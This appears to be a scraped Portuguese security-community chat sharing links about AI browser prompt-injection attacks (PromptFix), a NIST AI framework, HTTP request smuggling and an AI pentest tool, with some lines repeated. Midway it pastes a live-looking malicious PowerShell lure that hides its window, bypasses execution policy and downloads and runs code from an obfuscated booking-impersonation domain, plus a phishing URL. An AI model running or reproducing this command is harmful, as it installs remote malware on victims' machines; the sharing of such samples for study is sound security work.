Link para o texto da imagem: https://www.linkedin.com/posts/bruno-menozzi_a-nova-superf%C3%ADcie-de-ataque-n%C3%A3o-%C3%A9-seu-usu%C3%A1rio-activity-7365724038188490754-VRAf
Artigo sobre o PromptFix Attack: https://thehackernews.com/2025/08/experts-find-ai-browsers-can-be.html
Publicação do NIST sobre o novo framework: https://hackread.com/nist-concept-paper-ai-cybersecurity-framework/
Documento conceitual do NIST (PDF): https://csrc.nist.gov/pubs/cswp/29/the-way-forward/final/docs/sais-concept-paper_2025/08/14.pdf
O John Hammond publicou um vídeo ha 3 horas falando sobre isso e outros caracteres parecidos que tem o mesmo comportamento:
https://youtu.be/nxVr4ERhrPQ?si=-Lbb1B2Qs8hNp4w9&t=609
Vocês podem usar essa acao customizada usando esse código aqui:
https://github.com/PortSwigger/bambdas/blob/main/CustomAction/RetryUntilSuccess.bambda
https://github.com/PortSwigger/bambdas/blob/main/CustomAction/RetryUntilSuccess.bambda
Saiba como diferenciar:
https://portswigger.net/research/how-to-distinguish-http-pipelining-from-request-smuggling
Vídeo que tô assistindo hoje, da época que o ManoelT fazia live com uma galera. É antigo, de 5 anos atrás, mas com certeza vale ainda (os conceitos se aplicam na atualidade).
https://www.youtube.com/watch?v=1RmBufOHkPo
https://www.youtube.com/watch?v=1RmBufOHkPo
https://github.com/aliasrobotics/cai
Não uso muito essas coisas prontas de IA, mas fiquei curioso sim. Alguem a fim de testar e dar um feedback se vale a pena?
Não uso muito essas coisas prontas de IA, mas fiquei curioso sim. Alguem a fim de testar e dar um feedback se vale a pena?
powershell -c "Invoke-Expression((Get-Clipboard -Raw).Substring(261)); Start-Sleep 1;" Ray ID: 3658b22362ef2157 powershell -nop -ep bypass -C ((Add-Type '[DllImport("user32.dll")]public static extern bool ShowWindow(IntPtr hWnd,int nCmdShow);' -Name W -PassThru)::ShowWindow((Get-Process -Id $PID).MainWindowHandle,0));Write-Host "Please wait.";iex([IO.StreamReader]::new([Net.WebRequest]::Create("htt"+"p:/"+"/www-"+"acco"+"unt-"+"book"+"ing"+".co"+"m/c.php?a=0"+"").GetResponse().GetResponseStream())).ReadToEnd();$v="d1008b"http://account.booking.xn--comdetailrestric-access-ge5vga.www-account-booking.com/en/
Esse vídeo saiu hoje e vai estar mt massa com certeza!
Principalmente depois daquela CVE da akamai que mencionamos aqui
https://www.youtube.com/watch?v=rr5VvMx4dT0
Principalmente depois daquela CVE da akamai que mencionamos aqui
https://www.youtube.com/watch?v=rr5VvMx4dT0